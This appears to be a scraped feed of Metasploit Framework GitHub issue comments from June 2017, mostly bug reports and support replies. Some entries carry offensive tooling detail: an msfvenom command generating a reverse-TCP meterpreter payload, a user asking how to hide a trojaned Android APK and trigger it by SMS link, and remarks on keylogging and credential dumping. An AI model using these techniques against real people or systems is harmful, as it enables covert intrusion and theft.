[-]failed to load modules: exploit

How can i fix this ?

[2017-06-13 05:56] OJ commented on #8550
Learn to use Metasploit. There are lots of tutorials out there on the internet. This is not an issue with Metasploit. Thanks.

[2017-06-13 05:56] #8550 closed

[2017-06-13 06:03] sangria123 commented on #8550
Okay sir thanks
On Jun 13, 2017 2:02 PM, "OJ Reeves" <notifications@github.com> wrote:

[2017-06-13 06:27] wvu-r7 commented on #4973
Wrong place to be asking that question.

[2017-06-13 13:44] kerlingcode opened #8552 "chinese character in meterpreter has become garbnle"
i need to download a file in Chinese
but the response is
![pics](https://user-images.githubusercontent.com/21171415/27085242-510f1c46-5081-11e7-8fd5-e97a86cd0de2.png)

it is my bad on configuring the client?

[2017-06-13 14:05] Spyro289 commented on #8527
That weird I changed the "ProcessName" from "spoolsv.exe" to "Explorer.exe" and it work better against an actual environment but still crashes regardless of Payload or Process

[2017-06-13 14:06] wvu-r7 commented on #8527
Setting `ProcessName` doesn't actually work yet, since the kernel payload is hardcoded.

[2017-06-13 20:24] wvu-r7 commented on #8552
Are you running Metasploit on Windows?

[2017-06-13 20:27] wvu-r7 commented on #8542
Yes. One thing to note is that `ms16_051_vbscript` is `NormalRanking`.

[2017-06-13 20:27] #8542 closed

[2017-06-13 21:08] amster699 commented on #8477
hey bro how can i fix this ??
let me now if you can help thanks

msf auxiliary(smb_ms17_010) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) >﻿

[2017-06-13 21:21] h00die commented on #8477
@amster699 I fixed it by wrapping your console output in ```.

[2017-06-13 21:31] amster699 commented on #8477
sorry brother did not understand very well wat you meaning..
can you explain bether?
thanks

[2017-06-13 21:33] amster699 commented on #8477
should i have also port 4444 enabled right?

[2017-06-13 21:36] amster699 commented on #8477
if you can leave here the comands i should use for that i will stay very thankfull brother thanks

[2017-06-13 22:10] grantwhitaker06 commented on #6829
@bcook-r7 worked for me thanks man.

[2017-06-13 22:48] jeffmcjunkin commented on #8525
@busterb As far as I can tell, creddump7 (which works successfully on Win7 x86 and Win10 x64 at least) uses AES128 (https://github.com/Neohapsis/creddump7/blob/master/framework/win32/domcachedump.py#L41), as does the Metasploit module.

My guess is that there are more bytes in the registry value, since `cachedump.rb` goes from offset 16 to the end of the value (which could explain the error shown

[2017-06-14 00:19] kerlingcode commented on #8552
yep ,i'm running on the windows by the pentestbox
and the target is also running on the windows7 system
what should i do?

[2017-06-14 00:59] busterb commented on #8552
This is an intentional default setting for windows, since the command prompt used to not support Unicode. You can try `set EnableUnicodeEncoding false` in before you start the session. I'm not sure what terminal Pentestbox uses, it might work.

[2017-06-14 00:59] #8552 closed

[2017-06-14 02:30] hktalent opened #8554 "why not run in win7？"
metasploit v4.14.27-dev-55f0edb732

$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.24.10 LPORT=4444 -e x64/xor –f exe -o exploit.exe;ls -la *.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succe

[2017-06-14 02:45] viniciusmarangoni opened #8555 "Undefined method "peer_native_os" in exploit ms17_010_eternalblue"
I am having problem while executing this module on Metasploit. I just set the RHOST and type "exploit", without SMB Credentials (the default). I'm having the following error message:

[*] 192.168.0.13:445 - Connecting to target for exploitation
[*] 192.168.0.13:445 - NoMethodError
[*] 192.168.0.13:445 - undefined method `peer_native_os' for #<RubySMB::Client:0x0055788111abd0>

The problem is appea

[2017-06-14 04:43] void-in commented on #8554
I am not able to reproduce this at my end.
[code]
I am going to close this since there is no bug. Please use https://community.rapid7.com for support queries.

[2017-06-14 04:43] #8554 closed

[2017-06-14 08:01] Calabrase commented on #8443
I also have the same error and I'm still waiting for the answer. It was pre installed and I ran the updates

[2017-06-14 08:06] busterb commented on #8443
You will have to insist that the ParrotSec packager either fix the issue remotely, or at least update to a later version of metasploit, where we added ParrotSec-specific workarounds (see PR above). Not much more we can do here.

[2017-06-14 08:19] busterb commented on #7970
This is fixed now, since we changed to the new Linux meterpreter.

[2017-06-14 08:19] #7970 closed

[2017-06-14 08:54] saikumar100 commented on #8546
@busterb
But in show options I am seeing only smb_share_name option only. So, how can I give more options such as os,etc.,

[2017-06-14 12:39] h00die opened #8556 "ssh_creds"
For my notes to look in to later unless someone else wants to.

[code]

[2017-06-14 13:57] isbear commented on #8548
Merged. Thanks.

[2017-06-14 13:57] #8548 closed

[2017-06-14 14:15] Calabrase commented on #8398
Am sorry, I am a novice to Linux.  After problems with the git repo. Am now having this error above 'fatal: Needed a single revision. You pointed to talk with Package maintainer. How can I reach mine, for same distro

[2017-06-14 14:21] busterb commented on #8398
go here: https://community.parrotsec.org/ post a message

[2017-06-14 14:50] dmaloney-r7 commented on #8555
@viniciusmarangoni How is your Metasploit installed? Github, Kali, Omnibus? It looks like you are running with an outdated version of ruby_smb somehow

[2017-06-14 14:58] h00die opened #8557 "enum_users_history crash"
[code]

[2017-06-14 17:11] busterb commented on #8554
This isn't a support forum, try IRC or community.rapid7.com. Thanks.

[2017-06-15 06:14] Rogdham opened #8560 "post/windows/gather/cachedump iteration count for mscash2 format"
## Steps to reproduce

1. Get a meterpreter session on a domain machine (Windows Vista or later)
2. Run post/windows/gather/cachedump

_[Relevant code](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/cachedump.rb#L171)_

## Expected behavior

The iteration count of the mscash2 format should be taken from the registry.

[This post](http://blog.gentilkiwi.com/s

[2017-06-15 07:33] bcoles opened #8561 "Cannot restart msfrpc from msfconsole"
Loading msgrpc from msfconsole works fine.

Once it's loaded it's impossible to change the configuration. (for instance, if you forget the `SSL=y` flag or set a weak password).

There's also no option to restart msfrpc.

Trying to launch msfrpc again kills the listening socket without creating a new instance. Likewise, trying to unload msgrpc then load msgrpc prevents any future instances of msfrp

[2017-06-15 10:34] hktalent opened #8562 "osx bug?"
https://osx.metasploit.com/metasploitframework-latest.pkg
$ ruby -v
ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-darwin16]

$ cat ~/.bash_profile | grep ruby
export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"

$ pwd
/opt/metasploit-framework
QQ1160:metasploit-framework xiatian$ ./embedded/bin/ruby -v
ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-darwin16]

$/opt/metasploit-framewor

[2017-06-15 10:54] h00die opened #8563 "ssh_login error"
[code]

[2017-06-15 15:46] busterb commented on #8538
It's saying there is a connection error, which leads me to believe you have an issue in the supplied parameters. There's an error coming down from the 3rd-party openvas-omp gem. You might track down who maintains that.

[2017-06-15 15:52] Swiftb0y commented on #8538
yeah.... the last update was made in early 2011: https://github.com/kost/openvas-omp-ruby
So is the plugin dead or will r7 make a replacement?

[2017-06-15 15:54] busterb commented on #8538
It's an open-source project, anyone can improve it.

[2017-06-15 15:56] Swiftb0y commented on #8538
Anyone who knows how to make gems, which is not me...

[2017-06-15 16:00] pbarry-r7 commented on #8538
@Swiftb0y, you might check you are connecting the the correct mgmt port (usually it's 9390): http://www.ehacking.net/2011/11/how-to-use-openvas-in-metasploit.html

[2017-06-15 16:06] Swiftb0y commented on #8538
GOD!!! I hate myself... that was the problem. I literally tried ports 9391 through 9399....
Sorry for costing you time.

[2017-06-15 16:06] #8538 closed

[2017-06-15 16:13] pbarry-r7 commented on #8538
Glad it worked out.  :+1:

[2017-06-15 21:08] bcoles opened #8567 "enum_wayback module no longer works"
Someone on IRC pointed out that the enum_wayback module is not working. They're correct.

## Steps to reproduce

* [x] `use auxiliary/scanner/http/enum_wayback`
* [x] `set DOMAIN rapid7.com`
* [x] `run`

## Example Output

[code]

## API

The module should probably use an API.

Here's a couple of example APIs which may be useful.

* hxxp://web.archive.org/web/timemap/link/http://example.com
* hxxp

[2017-06-15 22:14] shawndeckerr commented on #8521
@dmaloney-r7 I'm running this on a Windows Server 2008 Standard server and a Windows 7 PC.
Looking at the pcaps, I see the status shows a LOGON_FAILURE but Metasploit returns a NBSS Header error. Also I noticed that this issue happens when I run the module against multiple targets. I ran this against 11 targets. For instance:
_set RHOSTS 192.168.20.23 192.168.20.24 192.168.20.25 192.168.20.26 192.

[2017-06-16 00:11] wvu-r7 commented on #8567
Taking a look, mate. Thanks.

[2017-06-16 01:48] bcoles commented on #8567
For reference, here's how the output [used to look](https://www.offensive-security.com/metasploit-unleashed/scanner-http-auxiliary-modules/) :

[code]

[2017-06-16 02:46] kalifan commented on #8544
@busterb hi again here are the information

iam using nmap to check vulnerability and information about of target

Host is up (0.29s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer n

[2017-06-16 03:18] bcoles commented on #8561
Fixed in #8535

[2017-06-16 03:18] #8561 closed

[2017-06-16 07:37] sempervictus opened #8571 "Modules wanted for Phoenix Talon CVEs (9075-9077)"
[Phoenix Talon](https://translate.google.com/translate?hl=en&sl=zh-CN&u=http://paper.seebug.org/327/) seems to present low hanging fruit for attack since its not based on application services but a remotely accessible set of flaws within the kernel. Implementation as RCE should provide wide coverage with significant longevity thanks to the embedded market. Any takers? :)

[2017-06-16 14:52] islamTaha12 opened #8572 "huawei_hg532n_cmdinject can't be done in LAN"
/exploit/linux/http/huawei_hg532n_cmdinject
This exploit can't be done in LAN cause its automatically try to expose the local telnet port to a random port then try to make a telnet connection to this public port

[2017-06-16 15:54] wvu-r7 commented on #8572
You're going to need to provide more info than that.

[2017-06-16 16:08] jmartin-r7 commented on #8572
Reviewed the code for this module, it is designed for use from the perspective of an outside attacker to gain access to router and then extend access into the local LAN.  @islamTaha12 is correct that the module has external expectations attempts to expose telnet outside the NAT which is documents this very clearly in the description and code.  There is no defect in the current design, however an o

[2017-06-17 00:55] #8562 closed

[2017-06-17 09:46] Rogdham commented on #8525
By increasing verbosity (`set verbose true`) when running the module, I found the following line printed:

[code]
Which is 96 bytes long, so taking bytes from position 16 will be more than the 16 bytes needed for the
aes-128-cbc key.

Could you try may pull request above?

[2017-06-17 09:48] Rogdham commented on #8560
I am currently working on it, but #8525 should be fixed beforehand.

[2017-06-17 17:59] Rogdham commented on #8525
Ok, so this issue was comming from [a revision in the OpenSSL module](https://bugs.ruby-lang.org/projects/ruby-trunk/repository/revisions/55146) which stops accepting keys with invalid length (before, they were just truncated).

[2017-06-17 18:00] Rogdham commented on #8525
This issuse is comming from [a revision in the OpenSSL module](https://bugs.ruby-lang.org/projects/ruby-trunk/repository/revisions/55146) that stops accepting keys longer than needed (before they were just truncated).

[2017-06-17 19:02] bcoles commented on #8557
Presumably `/etc/issue` does not exist on the target system.

This (untested) patch will prevent the crash. Might cause other problems.

[code]

[2017-06-17 19:42] h00die commented on #8557
Device may have been a commercial grade router (cisco etc), which def doesn't have /etc/issue. So thats a very good possibility

[2017-06-17 20:10] bcoles commented on #8537
Yeah there's a bunch of these.

For post modules, there's a few ways to retrieve the directories, but they too may only work on English systems.

It seems most post modules use one or more of these environment variables:

* `%ProgramFiles%`
* `%ProgramFiles(x86)%`
* `%ProgramW6432%`

Like so:

[code]

Perhaps it would be best to allow users to specify the directory as a fallback.

[2017-06-17 20:23] Rogdham commented on #8560
On a side note, the current format ouput as “John the Ripper format” is invalid, and cannot be cracked with john currently (the `#` after `$DCC2` should be removed).

As discussed on the John the Ripper issue mentionned above:

However, I believe that better than just removing that `#` to fix the output, we could add the iteration count while we're at it.

[2017-06-17 22:50] bcoles commented on #8506
You can launch virtual machines with Workstation using:

[code]

It's worth noting that this issue affects both VMWare Workstation and VMWare player.

You can launch virtual machines with Player using:

[code]

This might be useful in instances where VMWare player is registered, however VMWare workstation is not. Unregistered Workstation cannot open VMs.

This barebones VMX file is sufficient to t

[2017-06-17 22:57] jihadLkmaty218 commented on #8480
use Script Exploit Figlet + .bashrc CVE-2017-4490
Add a name beside the name Terminal the Target
https://github.com/jihadLkmaty218/CVE-2017-4490-/blob/master/Add%20a%20name%20beside%20the%20name%20Terminal%20Target
-------------------------------------------------------------
+ code-Text-Moving-On Terminal Target 💣💣💣💣 ​​
-----------------------------------------------------
https://github.com/jiha

[2017-06-17 23:42] bcoles commented on #8506
Here's an exploit.

[code]

[code]

[2017-06-18 11:09] bcoles commented on #8506
Verified on VMware 11.1.2 on Linux Mint and 12.5.0 on Debian Linux.

PR #8581

[2017-06-18 13:26] Rogdham commented on #7936
Hello everyone, I tried to fix the hashdump module, could give #8582 a try?

I did not find any issue with cachedump specific to Windows 10. That being said, if you have the module crash, look at #8578, if you cannot crack hashes with john, look at #8580.

[2017-06-18 14:23] p3nt4 commented on #7936
Hey, I think I was mistaken concerning the cachedump issue. Please disregard.

[2017-06-18 17:00] CubanCigar opened #8583 "mysql_login issue"
## Expected behavior

https://www.offensive-security.com/metasploit-unleashed/using-databases/#Creds
Following this and it should successfully complete but its not.

Can't figure out whats wrong? Can anyone please advise?

### Metasploit version
v4.14.25-dev

### OS
VM VirtualBox

Thanks

[2017-06-18 18:16] void-in commented on #8583
How have you configured the module? run ```show options``` before running the module and paste the output. It seems you haven't configured the username/password (or username/password lists) of the module.

[2017-06-18 20:32] CubanCigar commented on #8583
Here you go:

[code]

[2017-06-18 22:10] viniciusmarangoni commented on #8555
You're right. I was using an outdated version. Thanks I'll close the issue.

[2017-06-18 22:11] #8555 closed

[2017-06-18 23:38] islamTaha12 commented on #8572
@wvu-r7 its exactly as @jmartin-r7 described.
I think it could be a feature request and I think it's too easy to modify by adding a new parameter to define if we need to expose telnet or not

[2017-06-19 01:21] #8393 closed

[2017-06-19 01:51] wvu-r7 commented on #8572
Patches welcome.

[2017-06-19 01:51] #8572 closed

[2017-06-19 01:54] timwr commented on #8460
@harshil2105 I can't reproduce this. If you can help me reproduce this I can probably fix it.

[2017-06-19 01:54] #8460 closed

[2017-06-19 04:22] harshil2105 commented on #8460
Ok maybe I can I faced this issue on multiple servers....just provide your email address or maybe if you are on discord it would be.nice

[2017-06-19 04:53] timwr commented on #8460
Hmm I wonder if it's just a delay while transmitting the final stage. You can email me at timrlw [at] gmail.com

[2017-06-19 07:30] aldoelam commented on #4604
to update exploitdb:
searchsploit -u
if you do not have -u option:
replace your searchsploit executable with the one from here:
https://github.com/offensive-security/exploit-database/blob/master/searchsploit

[2017-06-19 11:02] CubanCigar commented on #8583
I tried that still same issue:
[code]

[2017-06-19 13:05] maiki1337 opened #8585 "Compatible NOPs selection order"
It seems the order to select the possible NOPs has changed.
Before, when the ranking was the same, the NOP was selected in alphabetical order.
However now it seems to be in reverse alphabetical order.

This seems to be, at least, affecting the `oracle9i_xdb_ftp_pass` exploit.

## Steps to reproduce

Using an old version `4.5.0-dev` on `Backtrack`, the `nop/x86/opty2` NOP is being used for the `ora

[2017-06-19 15:09] void-in commented on #8583
That is the intended behavior. The root:root isn't the correct credential of the MySQL configured on the target server. If you have problem understanding the functionality of the module, please ask at https://community.rapid7.com

[2017-06-19 16:02] CubanCigar commented on #8583
Ok thank you for taking time to help me out - I will check it out - cheers.

[2017-06-19 16:07] #8583 closed

[2017-06-19 18:41] #7936 closed

[2017-06-19 19:16] #8525 closed

[2017-06-19 19:16] #8560 closed

[2017-06-19 23:59] jeffmcjunkin commented on #8525
Woohoo! I can confirm this worked on my affected machines. Thanks, @Rogdham! Sorry I couldn't test last week, I was traveling for work.

[2017-06-20 00:04] jeffmcjunkin commented on #8465
Umm, the flaw was patched with the new Android API version that came out with Android 4.2.

I really like `exploit/windows/smb/ms08_067_netapi`, but patched machines are patched against that exploit module. Similarly, Android versions starting at 4.2 are no longer vulnerable to webview_addjavascriptinterface, so there isn't a way to update the exploit module to suddenly start working again on newe

[2017-06-20 04:13] void-in commented on #8465
The flaw was fixed in Android 4.2 as @jeffmcjunkin mentioned. This is not some kind of click and run exploit which can be ported to any android version. Therefore, what you are asking for isn't possible. I am doing to close this issue. Thanks.

[2017-06-20 04:13] #8465 closed

[2017-06-20 15:23] Aminekanane commented on #8302
Good morning all, any updates on this ?

[2017-06-20 17:24] Rogdham commented on #8525
No problem @jeffmcjunkin, thank you for your feedback, I'm glat I was able to solve the issue 😃

[2017-06-20 20:04] jtingkir opened #8588 "Timestomp error"
## Steps to reproduce
I did timestomp to a windows 7 32 bit file located in "c:\" from a reverse_http meterpreter. Before I've loaded the priv and also do getsystem.
I ran several timestomp command
step 1. timestomp text.txt -c "[dates]"
step 2. timestomp text.txt -b
step 3. timestomp text.txt -v

Timestomp result error as following:
step 1. Error running command timestomp: NoMethodError undefined

[2017-06-21 10:36] ztencmcp opened #8591 "Download non-English filename failed"
Hello,

I found that i couldn't download any non-English filename with metasploit's meterpreter, is there any solutions? Thank you very much.

[2017-06-21 12:16] busterb commented on #8591
Meterpreter supports unicode file names, you'll have to be more specific.

What is your environment, target, etc. Can you paste some output so we know what you're seeing?

[2017-06-21 19:42] Aspect9 commented on #8096
What does 'Invalid Cred details can't be blank" mean>? is it a login in setting parametre required? thanks.

[2017-06-21 19:47] #8567 closed

[2017-06-21 23:20] umerov1999 opened #8595 "Doesn't work migrate meterpreter"
When x86 meterpreter do migrate to x86 or x64 process, that process is crashed. Tested on Windows 7 and 10. (metasploit v4.14.28-dev)

[2017-06-21 23:28] umerov1999 commented on #8591
On windows, metasploit framework doesn't support Cyrillic symbols from keyboard. Please add feuture encoder from utf8 to cp1251 instead unicode encoding

[2017-06-21 23:59] OJ commented on #8595
I'm running `metasploit v4.14.28-dev-b51fc0a34e` and it works fine here.

Windows 10:
![image](https://user-images.githubusercontent.com/28896/27411387-cd31962c-5730-11e7-9afa-24f042b640f6.png)

Windows 7:
![image](https://user-images.githubusercontent.com/28896/27411481-53eef3d0-5731-11e7-9318-382fa2ff8c1a.png)

Is AV running your target?

[2017-06-22 00:37] OJ commented on #8595
Going to close this issue as it's probably specific to your environment/configuration. It's definitely working on HEAD/master in all the environments I've tested it on (6 machines so far). The kinds of things the cause these things to break are AV when migrating too soon.

[2017-06-22 01:01] umerov1999 commented on #8595
Maybe it's because I'm using Ruby 2.4 on Windows?

[2017-06-22 01:02] OJ commented on #8595
You said that the Meterpreter process crashes, right? That has nothing to do with Ruby.

[2017-06-22 01:05] umerov1999 commented on #8595
Migrate shellcode was send metasploit framework to meterpreter

[2017-06-22 01:07] OJ commented on #8595
Ah true, if metasm is generating invalid shellcode, then it wouldn't work. However, I'd have thought that if the shellcode generation failed then the migration wouldn't actually occur.

[2017-06-22 01:21] umerov1999 commented on #8595
I downgrade Ruby from 2.4 to 2.3. Migration is successfully. Thanks

[2017-06-22 01:24] OJ commented on #8595
Wow, that's not good! Thank you for the information. @bcook-r7 seems like there's something screwy going on with Metasm on ruby 2.4 for Windows? :(

[2017-06-22 07:02] wvu-r7 commented on #7921
So, turns out I noticed this for the `to_s` case, which #8197 doesn't address. I think you did the right thing by leaving it alone, @FireFart.

I can use `to_terminal_output` with my non-`HttpTrace` chunked responses for now.

Also, it appears that the `HTTP::chunked` evasion option was never implemented.

[2017-06-22 07:13] busterb commented on #8595
It's a possibility. Metasm uses some guts of the ruby VM as part of its implementation, e.g. labels are derived from the addresses of ruby objects.

[2017-06-22 07:18] busterb commented on #8588
I'll take a look, I touched this code last = new timestomp maintainer :)

[2017-06-22 07:22] busterb commented on #8302
The plan is to move the builder to a 10.8 vm for compatibility. I've got the boxes setup, just need a few more days to deploy.

[2017-06-22 07:39] busterb commented on #8557
Interesting - mettle has its own internal version of this as well:

https://github.com/busterb/sigar/blob/master/src/os/linux/linux_sigar.c#L2987

[2017-06-22 15:54] dirkjanm opened #8597 "Session logging cuts commands short"
## Steps to reproduce

1. Enable session logging
`setg SessionLogging true`
2. Spawn a meterpreter
3. Run some commands
4. Open session log from ~/.msf4/logs/session/
5. Notice that the last letter of the command is always cut off
6. Be confused

Example terminal log:

[code]

Text in session log:
[code]

## Expected behavior

Complete commands should get logged

## Current behavior

The last lett

[2017-06-22 16:00] dirkjanm commented on #8597
Probably something going wrong around here: https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/logging/sinks/timestamp_flatfile.rb#L16

[2017-06-22 20:56] mubix opened #8598 "Feature Request - Screenshot based workspace"
It would be nice if all screenshots (+all loot) were tossed into loot in a folder based on the workspaces

[2017-06-22 22:22] OJ commented on #8598
I'd rather not have that. I'd like everything that comes down from a client
to now come down into the .msf4 folder. Is much prefer the ability to set a
working folder for sessions before they come in, and default all downloads
there, including post module stuff, loot, and Meterpreter command results.
This gets a -1 from me, sorry @mubix :) I do support the workspace bit,
just not the loot bit (unl

[2017-06-23 01:22] #8199 closed

[2017-06-23 10:17] bcoles commented on #7789
`get_pidgin_creds.rb` appears in the list twice.

This script gets the creds, buddies and logs from Pidgin.

[post/multi/gather/pidgin_cred module](https://github.com/rapid7/metasploit-framework/tree/master/modules/post/multi/gather/pidgin_cred.rb) exists which gets the creds and buddies, but does not get the logs.

[2017-06-23 10:49] bcoles commented on #7789
[scripts/meterpreter/get_env.rb](https://github.com/rapid7/metasploit-framework/tree/master/scripts/meterpreter/get_env.rb) replaced by [modules/post/multi/gather/env.rb](https://github.com/rapid7/metasploit-framework/tree/master/modules/post/multi/gather/env.rb)

[2017-06-23 11:26] bcoles commented on #8018
+1 for this

Also, for local exploits, using `reg_file_for_cleanup` ensures files are cleaned regardless of whether a new session is returned; whereas hooking `on_new_session` will not.

[2017-06-23 14:52] jtingkir commented on #8588
I don't know if this will help or not, but:
1. timestomp -f original_file target_file => works on user directory (desktop, documents) not so much on any other directory below c:\
2. timestomp target_file -f original_file => didn't work anywhere
3. timestomp target_file -b & timestomp -b target_file => didn't work anywhere
4. timestomp target_file -c "01/01/01 01:01:01 AM" => didn't work anywhere

[2017-06-23 16:46] test-black commented on #6833
check payload an port

[2017-06-23 17:25] test-black opened #8602 "How to update autorunscript"
set autorunscript  again, but not work

[2017-06-23 22:53] #8597 closed

[2017-06-23 22:55] wvu-r7 commented on #8602
Idk, computers are hard. Maybe you can start by providing more details.

[2017-06-24 05:54] test-black commented on #8602
![calc](https://user-images.githubusercontent.com/28062894/27506111-1bd1c90a-58e4-11e7-8ae2-27cb9f1a511b.png)

then， update with this command：`set autorunscript 'multicommand -cl "TASKKILL /F /IM calc.exe /T"'`

it doesn't work :(  ,
![calc2](https://user-images.githubusercontent.com/28062894/27506124-9567749a-58e4-11e7-9511-9e91d993ff00.png)

[2017-06-24 08:13] test-black commented on #8602
Opps, my fault

[code]

[2017-06-24 18:27] netship01 opened #8605 "Apps(msfvenm) not hiding after installing/first activity"
## Steps to reproduce

How'd you do it?

1.Use msfvenom to generate payload(Main activity)(android/meterpreter/reverse_tcp)
2.install this apk to android(6.0.1)

## Expected behaviour
Apps should be hide from home screen after first launch

## Current behaviour

It stays there on home screen.
BTW i know there is way to hide app icon from meterpreter but i want to hide as soon as first activity is

[2017-06-24 18:50] h00die commented on #8605
Please clean up this issue, there is so much in here that you didn't remove I can't tell waht the actual issue is.  Please give output/screenshots from commands.
My **guess** is you are running parrot OS with a git pull of the latest code.  You attempted to make an APK package (not specifying if you bound into one for a trojan, or just a new one) with an unknown payload, and unknown options set.

[2017-06-24 19:44] brandonprry commented on #8415
It usually takes me days to set up Oracle software FWIW.

[2017-06-25 00:55] wvu-r7 commented on #8602
Did you figure it out?

[2017-06-25 01:15] test-black commented on #8602
Yes, use `resource ` command can update autorunscript, my fault

[2017-06-25 01:17] #8480 closed

[2017-06-25 01:19] wvu-r7 commented on #8602
Thanks!

[2017-06-25 01:19] #8602 closed

[2017-06-25 03:27] netship01 commented on #8605
Thanks for replying.
Please check this out and if possible in future please make this configurable.
https://github.com/rapid7/metasploit-payloads/pull/129
https://github.com/rapid7/metasploit-payloads/commit/8c752b46f0832c690ef0b628d3e710473ce992a7

and **any way to wake Main Activity by sms/link.**
This is in the androidManifest file
`_<data android:host="my_host" android:scheme="metasploit"/>_
`

[2017-06-25 04:31] timwr commented on #8605
The app icon is no longer hidden automatically, you can hide it with `meterpreter > hide_app_icon`
You can launch by link but I'm not sure what the point is. The session should be persistent unless you kill it with  `meterpreter > exit`

[2017-06-25 04:40] netship01 commented on #8605
**You can launch by link but I'm not sure what the point is**
what is the link i try this `intent://my_host#Intent;scheme=metasploit`

![ssss](https://user-images.githubusercontent.com/22903048/27513707-53ca3b3a-598e-11e7-9445-b445275b45cd.png)

        For best results, you can consider using the auxiliary/client/sms/send_text to
        trick your target into opening the malicious link, and wake

[2017-06-25 04:42] netship01 commented on #8605
BTW please make it configurable not mandatory.

[2017-06-25 14:44] kayaker-msf opened #8608 "keystroke sniffing stops working after killing background job which was previously sniffing"
If you start a background job (post module) to start sniffing keystrokes on remote windows machine and then kill it (and maybe with timeouts not really sure), I guess something is not cleaned up victim side (keystroke thread o timer maybe) because after that you can no longer capture keys in that session.
session keeps working ok but capture keys no longer capture anything no matter how many times

[2017-06-25 17:03] timwr commented on #8605
@netship01 I will make it configurable for you. I hope that will solve all your problems :)

[2017-06-25 17:48] gearcapitan opened #8610 "Failed to connect to the database: could not connect to server: Connection refused"
![kali linux-2017-06-25-12-45-49](https://user-images.githubusercontent.com/13740942/27518395-a49bdab2-59a4-11e7-8d50-805a6b160994.png)

[2017-06-25 18:02] netship01 commented on #8605
Oh! Man Thanks!!!!!

[2017-06-26 11:28] mohamedoc opened #8616 "Describe your feature request or bug report, succinctly"
If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.

If you're reporting a bug, please be sure to include the expected behavior, the observed behavior, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment would be appreciated.

For tips, see http://r-7.co/MSF-CONTRIB

[2017-06-26 12:35] #8616 closed

[2017-06-26 15:52] wwebb-r7 commented on #8359
@mapagm the changes to Meterpreter were merged, so you should see the behavior you want from `keyscan_start` now.

[2017-06-26 16:24] MathiasHaudgaard commented on #8583
Instead of setting the password, you can easily set BLANK_PASSWORDS to true. This will cause the module to try a blank password for all the users and you should be able to continue the tutorial.

[2017-06-26 17:35] S9pY commented on #8472
git config --global user.name "your github username"
git config --global email.name "your github primary email"
./msfupdate :)

[2017-06-26 20:28] wwebb-r7 commented on #8608
Do you happen to know if it worked as of last week?

I think I may know what the issue is if recent changes are to blame.  Looking into it.

[2017-06-26 21:10] kayaker-msf commented on #8608
No 100% sure, but I don't think it's a really recent issue (as a week at least).
I was having similar problems with a releast at least a moth ago, but didn't take the time to troubleshoot it, just spawn another session and capture keys in that one.
My guess is this problem is older.

[2017-06-26 21:20] wwebb-r7 commented on #8608
Alright thanks, after skimming I have a better idea of what the problem might be, and it may just be 1996 kind of old.    I'll update when it's fixed.

[2017-06-26 21:33] mubix opened #8617 "password_change not working"
Attempted the similar execution as is in the screenshot for #8549 but the arguments logic fails:
[code]
or

[code]
or

[code]
or

[code]

[2017-06-26 21:35] mubix commented on #8617
[code]

[2017-06-26 21:35] OJ commented on #8617
Dammit! I will look today. Which os??

On Jun 27, 2017 07:34, "Rob Fuller" <notifications@github.com> wrote:

[2017-06-26 21:37] OJ commented on #8617
Ok thanks.

On Jun 27, 2017 07:35, "Rob Fuller" <notifications@github.com> wrote:

[2017-06-26 21:42] mubix commented on #8617
Tested on multiple OSs, happens before it even issues the command down to the victim.

[2017-06-26 21:42] OJ commented on #8617
I'll get it fixed. Sorry!

On Jun 27, 2017 07:42, "Rob Fuller" <notifications@github.com> wrote:

[2017-06-26 22:06] OJ commented on #8617
One quick point re: blank passwords -- I don't think they'll work at all. Single/double quotes will kill the escaping going on the back end, I'm yet to figure out how to solve this problem.

[2017-06-27 01:56] Viss opened #8619 "Meterpreter has difficulty backgrounding channels on bad connections"
![image](https://user-images.githubusercontent.com/1756255/27567468-be1781a6-5aa0-11e7-8c26-adc6bc57c553.png)

On a gig, where the target laptop is owned by a person who goes to lots of meetings, shell sessions will hang when they shut their mac and get in an elevator. When I hit control-z to background that channel, meterpreter seems to choke, and has quite a lot of trouble backgrounding a channe

[2017-06-27 01:57] mubix opened #8620 "Off-by-one Issue with creds_all"
[code]

LM and NTLM on first row, NTLM and SHA1 on second

[2017-06-27 02:24] Viss opened #8621 "Meterpreter continuity"
On a live engagement, for a client that is a 100% mac shop, I've started encountering continuity issues with meterpreter (the python implementation, specifically).

I've noticed that people will shut their macs, go to another office, or to their homes or elsewhere, and re-open them - and meterpreter attempts to re-establish the connection.

The short way of describing what happens is "metasploit d

[2017-06-27 05:50] OJ commented on #8427
I think it's fair to say that the download issue that I was having has been fixed in the recent change to the downloads command that does adaptive downloading. Closing.

[2017-06-27 05:50] #8427 closed

[2017-06-27 05:54] wvu-r7 commented on #8415
Closing due to lack of interest.

[2017-06-27 05:54] #8415 closed

[2017-06-27 07:09] #8617 closed

[2017-06-27 09:09] #8359 closed

[2017-06-27 16:05] cbrnrd commented on #8621
Which payload are you using? I haven't had any trouble with any python meterpretet on a mac.

[2017-06-27 17:14] Viss commented on #8621
python/meterpreter/reverse_https

[2017-06-27 21:45] sempervictus commented on #8621
@Viss: standby for this to be resolved via the current TLV work @OJ is doing. Sessions will be better identified and resumed via the GUID work.

[2017-06-27 21:51] sempervictus opened #8626 "Do we need the binary encoding segment in our .rb files?"
In trying to make Metasploit run GIL-free with the fun aspects of RBX (JIT, partial pre-compilation, channels, etc) i ran into an awesome problem described in [this RBX issue](https://github.com/rubinius/rubinius/issues/3749).

It makes me wonder, do we, in MRI 2.3+, still need to use this approach introduced when we were fighting the new Ruby 1.9 encoding madness? Any Ruby experts in dev or commu

[2017-06-27 22:54] Viss commented on #8621
@sempervictus oh awesome! that'll be super helpful!
@OJ is one of my favorite wizards :D
